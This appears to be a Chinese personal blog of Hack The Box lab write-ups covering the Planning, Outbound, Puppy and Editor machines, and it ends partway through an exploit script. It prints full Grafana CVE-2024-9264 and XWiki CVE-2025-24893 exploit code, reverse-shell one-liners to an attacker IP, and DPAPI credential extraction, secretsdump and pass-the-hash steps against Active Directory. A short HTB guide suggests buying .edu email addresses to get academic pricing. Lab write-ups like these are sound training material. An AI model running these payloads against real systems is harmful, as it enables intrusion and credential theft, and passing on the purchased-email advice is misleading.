2in9ya2 Blog

Pwned-Exploiting HTB Planning

2025-08-27T09:30:34.965Z

Planning

第一步用nmap进行扫描

1	nmap -sV -sC --min-rate 2000 10.10.11.68 --verbose

发现有22、80端口。那就访问一下80端口

发现无法访问，那就添加到/etc/hosts里面

1	echo '10.10.11.68\tplanning.htb' \| sudo tee -a /etc/hosts

找一找，抓抓包，发现没什么可以利用的，那就扫下其他文件和子域名。

1	gobuster vhost -u http://planning.htb -w tools/SecLists/Discovery/DNS/combined_subdomains.txt --ne

扫出来一个grafana.planning.htb，加到/etc/hosts里面再访问。
利用题目给出的账号密码登录之后，发现grafana版本为11.0，找找CVE。

找到了CVE-2024-9264，以及相应POC。

import requests
import argparse

"""
Grafana Remote Code Execution (CVE-2024-9264) via SQL Expressions
See here: https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/

Author: z3k0sec // www.zekosec.com
"""

def authenticate(grafana_url, username, password):
    """
    Authenticate to the Grafana instance.

    Args:
        grafana_url (str): The URL of the Grafana instance.
        username (str): The username for authentication.
        password (str): The password for authentication.

    Returns:
        session (requests.Session): The authenticated session.
    """
    # Login URL
    login_url = f'{grafana_url}/login'

    # Login payload
    payload = {
        'user': username,
        'password': password
    }

    # Create a session to persist cookies
    session = requests.Session()

    # Perform the login
    response = session.post(login_url, json=payload)

    # Check if the login was successful
    if response.ok:
        print("[SUCCESS] Login successful!")
        return session  # Return the authenticated session
    else:
        print("[FAILURE] Login failed:", response.status_code, response.text)
        return None  # Return None if login fails

def create_reverse_shell(session, grafana_url, reverse_ip, reverse_port):
    """
    Create a malicious reverse shell payload in Grafana.

    Args:
        session (requests.Session): The authenticated session.
        grafana_url (str): The URL of the Grafana instance.
        reverse_ip (str): The IP address for the reverse shell.
        reverse_port (str): The port for the reverse shell.
    """
    # Construct the reverse shell command
    reverse_shell_command = f"/dev/tcp/{reverse_ip}/{reverse_port} 0>&1"

    # Define the payload to create a reverse shell
    payload = {
        "queries": [
            {
                "datasource": {
                    "name": "Expression",
                    "type": "__expr__",
                    "uid": "__expr__"
                },
                # Using the reverse shell command from the arguments
                "expression": f"SELECT 1;COPY (SELECT 'sh -i >& {reverse_shell_command}') TO '/tmp/rev';",
                "hide": False,
                "refId": "B",
                "type": "sql",
                "window": ""
            }
        ]
    }

    # Send the POST request to execute the payload
    response = session.post(
        f"{grafana_url}/api/ds/query?ds_type=__expr__&expression=true&requestId=Q100",
        json=payload
    )

    if response.ok:
        print("Reverse shell payload sent successfully!")
        print("Set up a netcat listener on " + reverse_port)
    else:
        print("Failed to send payload:", response.status_code, response.text)

def trigger_reverse_shell(session, grafana_url):
    """
    Trigger the reverse shell binary.

    Args:
        session (requests.Session): The authenticated session.
        grafana_url (str): The URL of the Grafana instance.
    """
    # SQL command to trigger the reverse shell
    payload = {
        "queries": [
            {
                "datasource": {
                    "name": "Expression",
                    "type": "__expr__",
                    "uid": "__expr__"
                },
                # install and load the community extension "shellfs" to execute system commands (here: execute our reverse shell)
                "expression": "SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM read_csv('bash /tmp/rev |');",
                "hide": False,
                "refId": "B",
                "type": "sql",
                "window": ""
            }
        ]
    }

    # Trigger the reverse shell via POST
    response = session.post(
        f"{grafana_url}/api/ds/query?ds_type=__expr__&expression=true&requestId=Q100",
        json=payload
    )

    if response.ok:
        print("Triggered reverse shell successfully!")
    else:
        print("Failed to trigger reverse shell:", response.status_code, response.text)

def main(grafana_url, username, password, reverse_ip, reverse_port):
    # Authenticate to Grafana
    session = authenticate(grafana_url, username, password)

    if session:
        # Create the reverse shell payload
        create_reverse_shell(session, grafana_url, reverse_ip, reverse_port)

        # Trigger the reverse shell binary
        trigger_reverse_shell(session, grafana_url)

if __name__ == "__main__":
    # Set up command line argument parsing
    parser = argparse.ArgumentParser(description='Authenticate to Grafana and create a reverse shell payload')
    parser.add_argument('--url', required=True, help='Grafana URL (e.g., http://127.0.0.1:3000)')
    parser.add_argument('--username', required=True, help='Grafana username')
    parser.add_argument('--password', required=True, help='Grafana password')
    parser.add_argument('--reverse-ip', required=True, help='Reverse shell IP address')
    parser.add_argument('--reverse-port', required=True, help='Reverse shell port')

    args = parser.parse_args()

    # Call the main function with the provided arguments
    main(args.url, args.username, args.password, args.reverse_ip, args.reverse_port)

1 2	# 直接执行 python3 poc.py --url http://grafana.planning.htb/ --username admin --password 0D5oT70Fq13EvB5r --reverse-ip 10.10.16.3 --reverse-port 4444

提权

反弹shell成功，并且为root权限，但是并没有发现flag。

传入linpeas.sh并执行看看。

# 本机执行
python -m http.server 8888

# 靶机执行
wget http://10.10.16.3:8888/linpeas.sh -O linpeas.sh

chmod +x linpeas.sh

执行完之后发现在容器里，看看有什么可以利用的。发现了这个有密码，问问GPT怎么看。

gpt说：👉 这是 Grafana 默认管理员凭证，在渗透中很关键。通常说明 Grafana 是用这个账号 enzo / RioTecRANDEntANT! 来运行的，可能也能拿来登录 Web 界面或复用到其他地方。

SSH登录下看看。登录成功了，顺手获得了user.txt。

可以看到开启了很多端口，那就一个一个试试，进行端口映射，发现8000端口可以登录。

1	ssh -L 9999:127.0.0.1:8000 enzo@10.10.11.68

然后找找系统内是不是存在密码，发现有个.db文件。

打开看到了密码凭证。

以root为账号，登录成功，发现是个设置定时任务的网站，那就反弹shell。

发现连接成功，获得root权限。

又学到了T_T

Pwned-Exploiting HTB Outbound

2025-08-27T09:30:34.965Z

Outbound

第一步用nmap进行扫描

1	nmap -sV -sC --min-rate 1000 --max-retries 1 10.10.11.73 --verbose

发现有22、80端口。

那就看看80端口服务，是个邮箱系统，直接把php代码甩给gpt，发现系统为Roundcube Webmail 1.6.10，那就开始找是否存在漏洞。

那就去找POC，CVE-2025-27591-PoC。

按照HTB的账号密码提示，以及POC的脚本执行命令，直接执行。

# 首先开启监听端口
ncat -lvnp 4444

php CVE-2025-49113.php http://mail.outbound.htb/ tyler LhKL1o9Nm3X2 'bash -c "bash -i >& /dev/tcp/10.10.16.3/4444 0>&1"'

直接反弹shell

提权

下一步就看看有啥能利用的，先切换到提示用户

su tyler
# 看看能不能创建交互式命令行
which python3
which python
# 都没有显示，那就不行了，如果有其他方法，我也不知道
# 进入home看看有几个用户
cd /home
ls -al
total 32
drwxr-xr-x 1 root  root  4096 Jun  8 12:05 .
drwxr-xr-x 1 root  root  4096 Jul  9 12:41 ..
drwxr-x--- 1 jacob jacob 4096 Jun  7 13:55 jacob
drwxr-x--- 1 mel   mel   4096 Jun  8 12:06 mel
drwxr-x--- 1 tyler tyler 4096 Jun  8 13:28 tyler
# 在tyler里面看一圈，好像也没啥东西，再看看有啥能执行，发现不行
sudo -l
bash: line 25: sudo: command not found

# 那就去网页的地方看看
cd /var/www/html
ls -la
total 28
drwxr-xr-x 1 root     root     4096 Jun  6 18:55 .
drwxr-xr-x 1 root     root     4096 Jun  6 18:55 ..
-rw-r--r-- 1 root     root      615 Jun  6 18:55 index.nginx-debian.html
drwxr-xr-x 1 www-data www-data 4096 Jun  6 18:55 roundcube

# 进到roundcube看看
cd roundcube
ls -al
total 412
drwxr-xr-x  1 www-data www-data   4096 Jun  6 18:55 .
drwxr-xr-x  1 root     root       4096 Jun  6 18:55 ..
-rw-r--r--  1 www-data www-data   2553 Feb  8  2025 .htaccess
-rw-r--r--  1 www-data www-data 216244 Feb  8  2025 CHANGELOG.md
-rw-r--r--  1 www-data www-data  12714 Feb  8  2025 INSTALL
-rw-r--r--  1 www-data www-data  35147 Feb  8  2025 LICENSE
-rw-r--r--  1 www-data www-data   3853 Feb  8  2025 README.md
-rw-r--r--  1 www-data www-data   1049 Feb  8  2025 SECURITY.md
drwxr-xr-x  7 www-data www-data   4096 Feb  8  2025 SQL
-rw-r--r--  1 www-data www-data   4657 Feb  8  2025 UPGRADING
drwxr-xr-x  2 www-data www-data   4096 Feb  8  2025 bin
-rw-r--r--  1 www-data www-data   1086 Feb  8  2025 composer.json
-rw-r--r--  1 www-data www-data  56802 Feb  8  2025 composer.lock
drwxr-xr-x  2 www-data www-data   4096 Jun  6 18:55 config
-rw-r--r--  1 www-data www-data  11200 Feb  8  2025 index.php
drwxr-xr-x  1 www-data www-data   4096 Jun 11 07:46 logs
drwxr-xr-x 37 www-data www-data   4096 Feb  8  2025 plugins
drwxr-xr-x  8 www-data www-data   4096 Feb  8  2025 program
drwxr-xr-x  3 www-data www-data   4096 Jun  6 18:55 public_html
drwxr-xr-x  3 www-data www-data   4096 Feb  8  2025 skins
drwxr-xr-x  1 www-data www-data   4096 Aug 13 01:40 temp
drwxr-xr-x 14 www-data www-data   4096 Feb  8  2025 vendor

# 看到有个config，看看去
cd config
ls -al
total 92
drwxr-xr-x 2 www-data www-data  4096 Jun  6 18:55 .
drwxr-xr-x 1 www-data www-data  4096 Jun  6 18:55 ..
-rw-r--r-- 1 www-data www-data   164 Feb  8  2025 .htaccess
-rw-r--r-- 1 root     root      3024 Jun  6 18:55 config.inc.php
-rw-r--r-- 1 www-data www-data  2943 Feb  8  2025 config.inc.php.sample
-rw-r--r-- 1 www-data www-data 65000 Feb  8  2025 defaults.inc.php
-rw-r--r-- 1 www-data www-data  2806 Feb  8  2025 mimetypes.php

# 看吧，一个一个的

cat config.inc.php

把内容直接甩给gpt，人家都说的很明白了。

# 因为没有交互式终端 只能连接同时执行数据库命令
mysql -u roundcube -p'RCDBPass2025' -h localhost roundcube -e "SHOW TABLES;"
Tables_in_roundcube
cache
cache_index
cache_messages
cache_shared
cache_thread
collected_addresses
contactgroupmembers
contactgroups
contacts
dictionary
filestore
identities
responses
searches
session
system
users

# 看看users吧，里面三个用户，也没有密码
mysql -u roundcube -p'RCDBPass2025' -h localhost roundcube -e "SELECT * FROM users;"
# 看看session

mysql -u roundcube -p'RCDBPass2025' -h localhost roundcube -e "SELECT * FROM session;"

有一串类似base64的字符串。

CyberChef来解一下，看到密码了，解一下，解不开，前面说用了DES加密，问问聪明的gpt。

聪明的gpt说这个用的是3DES，那就试试呗，先把密码转成HEX

key就是rcmail-!24ByteDESkey*Str，不知道IV是什么。问问聪明的gpt。

他说
具体流程是这样的（以旧版 3DES/rcube_crypto 为例）：当 Roundcube 用 des_key 加密 IMAP 密码时，会随机生成一个 8 字节的 IV。它把这个 IV 放在密文的前 8 个字节，然后再 Base64 编码。
那就取前8个字节呗。解出来是595mO8DmwGeD

那就试试呗，切换下用户jacob。

su jacob
Password: 595mO8DmwGeD
whoami
jacob

# 进去home看看
cd /home/jacob
ls -la
total 36
drwxr-x--- 1 jacob jacob 4096 Jun  7 13:55 .
drwxr-xr-x 1 root  root  4096 Jun  8 12:05 ..
lrwxrwxrwx 1 root  root     9 Jun  6 19:03 .bash_history -> /dev/null
-rw-r--r-- 1 jacob jacob  220 Mar 31  2024 .bash_logout
-rw-r--r-- 1 jacob jacob 3771 Mar 31  2024 .bashrc
-rw-r--r-- 1 jacob jacob  807 Mar 31  2024 .profile
drwx------ 1 jacob jacob 4096 Jul  9 12:41 mail

有个mail 看看，发现密码了，ssh一下试试

连接成功了，看看能不能提权到root

below是root权限执行的，看看啥版本

0.8 看看有没有CVE，经过查询，真有CVE-2025-27591

按照给出的POC，验证成功

又学到了T_T

Pwned-Exploiting HTB Puppy

2025-08-27T09:30:34.965Z

Puppy

第一步用nmap进行扫描

nmap -Pn -sC -sV 10.10.11.70 --verbose

# 结果为
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-26 12:26:00Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2049/tcp open  nlockmgr      1-4 (RPC #100021)
3260/tcp open  iscsi?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-08-26T12:28:14
|_  start_date: N/A
|_clock-skew: 7h00m00s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

NSE: Script Post-scanning.
Initiating NSE at 01:36
Completed NSE at 01:36, 0.00s elapsed
Initiating NSE at 01:36
Completed NSE at 01:36, 0.00s elapsed
Initiating NSE at 01:36
Completed NSE at 01:36, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 649.64 seconds
           Raw packets sent: 1990 (87.536KB) | Rcvd: 17 (732B)

连接下smb看看有啥什么东西。

┌──(root㉿192)-[~]
└─# smbclient -L 10.10.11.70 -U levi.james
Password for [WORKGROUP\levi.james]:

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
DEV             Disk      DEV-SHARE for PUPPY-DEVS
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.70 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available


# 使用smbclient访问无法看到对应目录
└─# smbclient //10.10.11.70/DEV -U PUPPY.HTB0\\levi.james%KingofAkron2025!
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*

# 首先同步时间
ntpdate puppy.htb  
# 之后获取TGT票据
impacket-getTGT PUPPY.HTB/levi.james:'KingofAkron2025!' -dc-ip 10.10.11.70
# 添加
export KRB5CCNAME="$(pwd)/levi.james.ccache"
# 测试下
nxc smb 10.10.11.70 -u 'levi.james' -p 'KingofAkron2025!' -d 'PUPPY.HTB' 

# 获取域信息
bloodhound-python -u levi.james -p KingofAkron2025! -k -ns 10.10.11.70 -c All -d puppy.htb --zip

导出后用bloodhoundCE查看，发现该用户可以对DEVELOPERS@PUPPY.HTB这个组进行写入。

# 使用bloodAD将用户写入
bloodyAD --host 10.10.11.70 -d PUPPY.HTB -u levi.james -p 'KingofAkron2025!' add groupMember DEVELOPERS levi.james

# 查看DEV
smbclient //10.10.11.70/DEV -U PUPPY.HTB0\\levi.james%KingofAkron2025!
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sun Mar 23 03:07:57 2025
  ..                                  D        0  Sat Mar  8 11:52:57 2025
  KeePassXC-2.7.9-Win64.msi           A 34394112  Sun Mar 23 03:09:12 2025
  Projects                            D        0  Sat Mar  8 11:53:36 2025
  recovery.kdbx                       A     2677  Tue Mar 11 22:25:46 2025

5080575 blocks of size 4096. 1595340 blocks available
# 获取文件
get recovery.kdbx

# keepass 的文件 利用keepass4brute 进行破解
./keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt

[*] Password found: liverpool

利用keepassxc 打开这个文件

得到五个密码

ADAM SILVERHJKL2025!
ANTONY C. EDWARDSAntman2025!
JAMIE WILLIAMSONJamieLove2025!
SAMUEL BLAKEILY2025!
STEVE TUCKERSteve2025!

users.txt

adam.silver
ant.edwards
jamie.williams
steph.blake
steve.tucker

password.txt

HJKL2025!
Antman2025!
JamieLove2025!
ILY2025!
Steve2025!

这样就可以进行smb测试了

netexec smb 10.10.11.70 -u users.txt -p password.txt
SMB         10.10.11.70     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.10.11.70     445    DC               [-] PUPPY.HTB\adam.silver:HJKL2025! STATUS_LOGON_FAILURE
SMB         10.10.11.70     445    DC               [-] PUPPY.HTB\ant.edwards:HJKL2025! STATUS_LOGON_FAILURE
SMB         10.10.11.70     445    DC               [-] PUPPY.HTB\jamie.williams:HJKL2025! STATUS_LOGON_FAILURE
SMB         10.10.11.70     445    DC               [-] PUPPY.HTB\steph.blake:HJKL2025! STATUS_LOGON_FAILURE
SMB         10.10.11.70     445    DC               [-] PUPPY.HTB\steve.tucker:HJKL2025! STATUS_LOGON_FAILURE
SMB         10.10.11.70     445    DC               [-] PUPPY.HTB\adam.silver:Antman2025! STATUS_LOGON_FAILURE
SMB         10.10.11.70     445    DC               [+] PUPPY.HTB\ant.edwards:Antman2025!

利用该用户登录smb，还是没有什么可以利用的，发现该用户可以完全控制adam.silver

1
2
3

# 修改adam.silver的密码

bloodyAD --host 10.10.11.70 -d PUPPY.HTB -u ant.edwards -p 'Antman2025!' set password adam.silver 'qwe123456!'

尝试了一遍之后，发现无法登录，后来发现其账号是禁用的状态

# 先查询其DN，再修改其状态

ldapsearch -x -H ldap://10.10.11.70 \
  -D "ANT.EDWARDS@PUPPY.HTB" -W \
  -b "DC=puppy,DC=htb" \
  "(sAMAccountName=ADAM.SILVER)"


ldapmodify -x -H ldap://10.10.11.70 -D "ANT.EDWARDS@PUPPY.HTB" -W << EOF
dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
changetype: modify
replace: userAccountControl
userAccountControl: 66048
EOF

# 修改完权限，尝试登录，因为从域关系来看，他是 Remote Management Users 组中的用户，可以通过WinRM (Windows Remote Management, TCP 5985/5986) 远程管理主机

evil-winrm -i 10.10.11.70 -u adam.silver -p 'qwe123456!'
# 连接成功
*Evil-WinRM* PS C:\Users\adam.silver\Documents>

提权

# 先看看
*Evil-WinRM* PS C:\Users\adam.silver\Documents> ls
*Evil-WinRM* PS C:\Users\adam.silver\Documents> cd ..
*Evil-WinRM* PS C:\Users\adam.silver> ls


    Directory: C:\Users\adam.silver


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-r---         2/28/2025  12:31 PM                3D Objects
d-r---         2/28/2025  12:31 PM                Contacts
d-r---         3/12/2025  12:09 PM                Desktop
d-r---          3/5/2025  10:16 AM                Documents
d-r---         2/28/2025  12:31 PM                Downloads
d-r---         2/28/2025  12:31 PM                Favorites
d-r---         2/28/2025  12:31 PM                Links
d-r---         2/28/2025  12:31 PM                Music
d-r---         2/28/2025  12:31 PM                Pictures
d-r---         2/28/2025  12:31 PM                Saved Games
d-r---         2/28/2025  12:31 PM                Searches
d-r---         2/28/2025  12:31 PM                Videos


*Evil-WinRM* PS C:\Users\adam.silver> cd Desktop
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> ls


    Directory: C:\Users\adam.silver\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/28/2025  12:31 PM           2312 Microsoft Edge.lnk
-ar---         8/27/2025   1:16 AM             34 user.txt

# 发现一个site-backup-2024-12-30.zip，拿下来看看

*Evil-WinRM* PS C:\> ls


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/9/2025  10:48 AM                Backups
d-----         5/12/2025   5:21 PM                inetpub
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---         7/24/2025  12:25 PM                Program Files
d-----          5/8/2021   2:40 AM                Program Files (x86)
d-----          3/8/2025   9:00 AM                StorageReports
d-r---          3/8/2025   8:52 AM                Users
d-----         5/13/2025   4:40 PM                Windows


*Evil-WinRM* PS C:\> cd Backups
*Evil-WinRM* PS C:\Backups> ls


    Directory: C:\Backups


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          3/8/2025   8:22 AM        4639546 site-backup-2024-12-30.zip

# 下载一下看看
*Evil-WinRM* PS C:\Backups> download site-backup-2024-12-30.zip

# 解压之后看到steph.cooper 和密码ChefSteph2025!
└─# cat nms-auth-config.xml.bak 
"1.0" encoding="UTF-8"?>

    
        DC.PUPPY.HTB
        389
        dc=PUPPY,dc=HTB
        cn=steph.cooper,dc=puppy,dc=htb
        ChefSteph2025!
    
    
        "username" ldap-attribute="uid" />
        "firstName" ldap-attribute="givenName" />
        "lastName" ldap-attribute="sn" />
        "email" ldap-attribute="mail" />
    
    
        "groupName" ldap-attribute="cn" />
        "groupMember" ldap-attribute="member" />
    
    
        (&(objectClass=person)(uid=%s))

可以看到steph.cooper 也是 Remote Management Users 组中的

# C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials 发现一个隐藏文件，GPT说Windows 凭据管理器 (Credential Manager) 存放的 DPAPI 凭据文件。
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> dir -h


    Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          3/8/2025   7:54 AM            414 C8D69EBE9A43E9DEBF6B5FBD48B521B9

# 接触隐藏并复制，然后下载下来
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> attrib -H -S .\C8D69EBE9A43E9DEBF6B5FBD48B521B9
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> copy .\C8D69EBE9A43E9DEBF6B5FBD48B521B9 cred.bin
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> download cred.bin
                                        
Info: Downloading C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\cred.bin to cred.bin
                                        
Info: Download successful!


*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> attrib -H -S 556a2412-1275-4ccf-b721-e6a0b4f90407

*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> copy 556a2412-1275-4ccf-b721-e6a0b4f90407 master.bin 
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-14879*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> download master.bin
                                        
Info: Downloading C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\master.bin to master.bin
                                        
Info: Download successful!


# 下载成功之后就可解masterkey 以及credential
impacket-dpapi masterkey -file master.bin -password 'ChefSteph2025!' -sid S-1-5-21-1487982659-1829050783-2281216199-1107

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags       :        0 (0)
Policy      : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
                                                             
# 解密得到steph.cooper_adm 和密码 FivethChipOnItsWay2025!

└─# impacket-dpapi credential -file cred.bin -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29+00:00
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=PUPPY.HTB
Description : 
Unknown     : 
Username    : steph.cooper_adm
Unknown     : FivethChipOnItsWay2025!

# 导出hash
impacket-secretsdump 'PUPPY.HTB/steph.cooper_adm:FivethChipOnItsWay2025!@10.10.11.70'

# 之后就可以管理员身份登录了
evil-winrm -i 10.10.11.70 -u Administrator -H bb0edc15e49ceb4120c7bd7e6e65d75b

又学到了T_T

How to use HTB?

2025-08-27T09:30:34.965Z

HTB

什么是HTB？

Hack The Box 是一个在线平台，用户可以在其中练习黑客技术、漏洞利用、权限提升、逆向分析等网络安全相关技能。它通过各种挑战（Challenges）和靶机（Machines）来模拟现实世界中的漏洞环境。

HTB VIP 和 HTB Academy VIP的区别

HTB VIP 主要面向想要提升实战渗透能力的用户，提供大量靶机、官方题解、以及完整挑战环境；而 HTB Academy VIP 则更偏向系统化学习，提供结构化课程与配套实验靶场，适合入门学习或打牢理论基础的用户。两者分别侧重“练”与“学”，互为补充。

HTB Academy VIP更适合0基础的，HTB VIP适合有一定基础的。

开始使用

注册

在注册网站进行注册，步骤省略。

登录以及使用

登录后选择HTB Lab进入。

新手直接选择
Stating Point

进入之后选择右上角

1	CONNECT TO HTB

接着选择Starting Point来进行连接，这是面向新手的教学专区，里面提供了一些免费的靶机供你练习。

接下来选择 OpenVPN 进行连接。Pwnbox 是 HTB 提供的基于网页的渗透测试环境，使用方便，但仅限会员用户使用。

点击后可以选择不同的连接协议，默认推荐使用UDP，如果无法连接，可切换为 TCP。选择合适的协议后，下载对应的 VPN 配置文件，并将其导入到OpenVPN中进行连接。

绿色之后就可以选择相应的Machine进行渗透啦。

后续

如果你想使用 HTB Academy 并购买会员，通常需要一个国外教育邮箱（.edu）。你可以通过网站EDUEmailShop购买该类邮箱。
购买邮箱后，使用它注册HTB Academy账号。注册完成后，前往Academy页面开通会员，每月费用为 8 美元。
建议使用PayPal绑定国内银行卡进行支付，便捷且支持自动续费。

Pwned-Exploiting HTB Editor

2025-08-27T09:30:34.964Z

Editor

第一步先上nmap进行扫描

1	nmap -sV -sC --min-rate 1000 --max-retries 1 10.10.11.80 --verbose

扫描结果显示目标主机开放了 22、80 和 8080 端口，其中 80 与 8080 端口表明其运行了 HTTP 服务。

第二步

访问目标的 HTTP 服务时发现无法正常响应，经检查需要将目标域名手动添加到/etc/hosts中才能访问。

进入网站后发现页面内容较为简单，没有明显可利用的渗透点。随后尝试访问其 8080 端口。

识别到目标运行的版本为 XWiki Debian 15.10.8，随后在 Exploit-DB 中检索到该版本存在已知漏洞，可被利用进行进一步渗透。

但是给出的POC无法使用，故寻找其他的POC。

#!/usr/bin/python3

import argparse
import urllib.parse
import requests
import sys

# Define color dictionary
color = {
    "NC": '\033[0m',
    "RED": '\033[91m',
    "GREEN": '\033[92m',
    "YELLOW": '\033[93m',
    "BLUE": '\033[94m',
    "MAGENTA": '\033[95m',
    "CYAN": '\033[96m',
    "WHITE": '\033[97m'
}


# Define some pretty characters
STAR: str = f"{color['YELLOW']}[{color['BLUE']}*{color['YELLOW']}]{color['NC']}"
WARNING_STR: str = f"{color['RED']}[{color['YELLOW']}!{color['RED']}]{color['NC']}"


# Ctrl+C
def signal_handler(sig, frame)->None:
    print(f"\n{WARNING_STR} {color['RED']}Ctrl+C! Exiting...{color['RESET']}")
    sys.exit(1)


def parse_arguments()->argparse.Namespace:
    """
    Get arguments from user
    """
    # Create an ArgumentParser object
    parser = argparse.ArgumentParser(description=f"{color['BLUE']}CVE-2025-24893{color['NC']} exploit by {color['RED']}gunzf0x{color['NC']}",
                                     epilog=f"""
{color['YELLOW']}Example usage:{color['NC']}
{color['GREEN']}python3 {sys.argv[0]} -t 'http://example.com:8080' -c 'ping -c1 10.10.10.10'{color['NC']}""",
                                     formatter_class=argparse.RawTextHelpFormatter)
    # Add arguments with flags
    parser.add_argument("-t", "--target", type=str, help="Target url. For example: 'http://example.com' or 'http://example.com:8080'", required=True)
    parser.add_argument("-c", "--command", type=str, help="System command to execute in the target machine", required=True)
    # Return the parsed arguments
    return parser.parse_args()


def check_url(original_url: str)->str:
    """
    Check if url provided is in correct format
    """
    if not original_url.startswith("http://") or not original_url.startswith("https://"):
        print(f"{WARNING_STR} protocol not found in url (HTTP or HTTPs). Assumming it is 'https' adding 'http://' string to url...")
        return 'http://' + original_url
    return original_url


def exploit(target: str, command: str)->None:
    """
    Exploit for CVE-2025-24893 attacking vulnerable endpoint
    """
    # Set target url
    print(f"{STAR} Attacking {color['CYAN']}{target}{color['NC']}")
    url_payload: str = f"{target[:-1] if target.endswith('/') else target}/xwiki/bin/get/Main/SolrSearch?media=rss&text="
    original_payload: str = f'}}}}{{{{async async=false}}}}{{{{groovy}}}}"{command}".execute(){{{{/groovy}}}}{{{{/async}}}}'
    encoded_payload: str  = urllib.parse.quote(original_payload)
    vulnerable_endpoint: str = f"{url_payload}{encoded_payload}"
    print(f"{STAR} Injecting the payload:\n{color['CYAN']}{vulnerable_endpoint}{color['NC']}")
    try:
